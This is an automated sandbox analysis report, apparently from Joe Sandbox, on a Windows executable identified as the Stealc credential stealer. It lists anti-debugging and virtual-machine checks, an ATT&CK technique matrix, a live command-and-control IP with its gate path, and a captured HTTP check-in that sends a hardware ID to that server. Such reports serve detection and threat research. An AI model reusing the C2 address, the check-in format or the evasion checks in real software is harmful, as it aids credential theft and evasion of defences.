                Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13642
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13654
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13694
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B45C0 VirtualProtect ?,00000004,00000100,000000000_2_008B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008C9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9750 mov eax, dword ptr fs:[00000030h]0_2_008C9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_008C78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_008C9600
                Source: file.exe, file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: zProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_008C7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_008C7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_008C7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_008C7A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.8b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.8b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37Nfile.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  unknown
                  http://185.215.113.37/e2b1563c6670f193.phpjZrfile.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    http://185.215.113.37/e2b1563c6670f193.php4file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      http://185.215.113.37/e2b1563c6670f193.phptfile.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.37/wsfile.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        http://185.215.113.37/e2b1563c6670f193.phpzfile.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          http://185.215.113.37/e2b1563c6670f193.phpHfile.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1539396
                              Start date and time:2024-10-22 16:10:45 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 19s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 84
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94664445453577
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'821'696 bytes
                              MD5:e146f5225dc59d28304d4ea38a3c1265
                              SHA1:f8b22e7a65737087d98f2991180ce701b4140db3
                              SHA256:6220e540efb2808a44871e88bc3624ad976feb663c6c445e71e6da8be8695f2a
                              SHA512:f787954eec1c61f2b80a92439ba9128f65169173c9e9305378be2f2aa9c31d0e214cc068c378ad7848fee0bc751f526659b05cb60bb0d33eae12cf73ebaca6df
                              SSDEEP:24576:ceu9yHUfKCXdz0/9NmUvfie22dCUTpnuaOj3kRiAIsnfPXMMycrRmtMjtMqgKyLK:Z8ym1Xdcme22dCuDa2Iarj1RK1S9WZA
                              TLSH:0085337C7C98C9CCC508C2FDD6BB64EAFA3453296489E54AC71986708F4E7709B871B2
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa8b000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F6398FD961Ah
                              rsm
                              sbb eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F6398FDB615h
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], cl
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x22800009135d5f0b8d2afaa7ba0abadca92c8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2950000x20011001e1352b7b4014ffb904b255ce275unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              pqeyqbvq0x4f30000x1970000x196a00664c0da78950dd576bb5325fa01c779cFalse0.9948731219259146data7.953729049995973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              oscgfsnm0x68a0000x10000x400a01519cdb97f657281757a8dd3596dbbFalse0.802734375data6.280815137065525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68b0000x30000x2200c1de790a69f4949445f3d725b4ceac12False0.05905330882352941DOS executable (COM)0.7328553963503524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              DLLImport
                              kernel32.dlllstrcpy
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-22T16:11:56.055353+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949706185.215.113.3780TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 22, 2024 16:11:54.764913082 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:54.770281076 CEST8049706185.215.113.37192.168.2.9
                              Oct 22, 2024 16:11:54.770347118 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:54.770510912 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:54.775973082 CEST8049706185.215.113.37192.168.2.9
                              Oct 22, 2024 16:11:55.719485998 CEST8049706185.215.113.37192.168.2.9
                              Oct 22, 2024 16:11:55.719625950 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:55.764700890 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:55.770507097 CEST8049706185.215.113.37192.168.2.9
                              Oct 22, 2024 16:11:56.055305004 CEST8049706185.215.113.37192.168.2.9
                              Oct 22, 2024 16:11:56.055352926 CEST4970680192.168.2.9185.215.113.37
                              Oct 22, 2024 16:11:59.510843992 CEST4970680192.168.2.9185.215.113.37
                              • 185.215.113.37
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.949706185.215.113.37805492C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 22, 2024 16:11:54.770510912 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 22, 2024 16:11:55.719485998 CEST203INHTTP/1.1 200 OK
                              Date: Tue, 22 Oct 2024 14:11:55 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 22, 2024 16:11:55.764700890 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a
                              Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="hwid"74E804B5FD762778904926------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="build"doma------CGCFIIEBKEGHJJJJJJDA--
                              Oct 22, 2024 16:11:56.055305004 CEST210INHTTP/1.1 200 OK
                              Date: Tue, 22 Oct 2024 14:11:55 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:0
                              Start time:10:11:50
                              Start date:22/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x8b0000
                              File size:1'821'696 bytes
                              MD5 hash:E146F5225DC59D28304D4EA38A3C1265
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.1%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13485 8c69f0 13530 8b2260 13485->13530 13509 8c6a64 13510 8ca9b0 4 API calls 13509->13510 13511 8c6a6b 13510->13511 13512 8ca9b0 4 API calls 13511->13512 13513 8c6a72 13512->13513 13514 8ca9b0 4 API calls 13513->13514 13515 8c6a79 13514->13515 13516 8ca9b0 4 API calls 13515->13516 13517 8c6a80 13516->13517 13682 8ca8a0 13517->13682 13519 8c6b0c 13686 8c6920 GetSystemTime 13519->13686 13521 8c6a89 13521->13519 13523 8c6ac2 OpenEventA 13521->13523 13525 8c6ad9 13523->13525 13526 8c6af5 CloseHandle Sleep 13523->13526 13529 8c6ae1 CreateEventA 13525->13529 13528 8c6b0a 13526->13528 13528->13521 13529->13519 13883 8b45c0 13530->13883 13532 8b2274 13533 8b45c0 2 API calls 13532->13533 13534 8b228d 13533->13534 13535 8b45c0 2 API calls 13534->13535 13536 8b22a6 13535->13536 13537 8b45c0 2 API calls 13536->13537 13538 8b22bf 13537->13538 13539 8b45c0 2 API calls 13538->13539 13540 8b22d8 13539->13540 13541 8b45c0 2 API calls 13540->13541 13542 8b22f1 13541->13542 13543 8b45c0 2 API calls 13542->13543 13544 8b230a 13543->13544 13545 8b45c0 2 API calls 13544->13545 13546 8b2323 13545->13546 13547 8b45c0 2 API calls 13546->13547 13548 8b233c 13547->13548 13549 8b45c0 2 API calls 13548->13549 13550 8b2355 13549->13550 13551 8b45c0 2 API calls 13550->13551 13552 8b236e 13551->13552 13553 8b45c0 2 API calls 13552->13553 13554 8b2387 13553->13554 13555 8b45c0 2 API calls 13554->13555 13556 8b23a0 13555->13556 13557 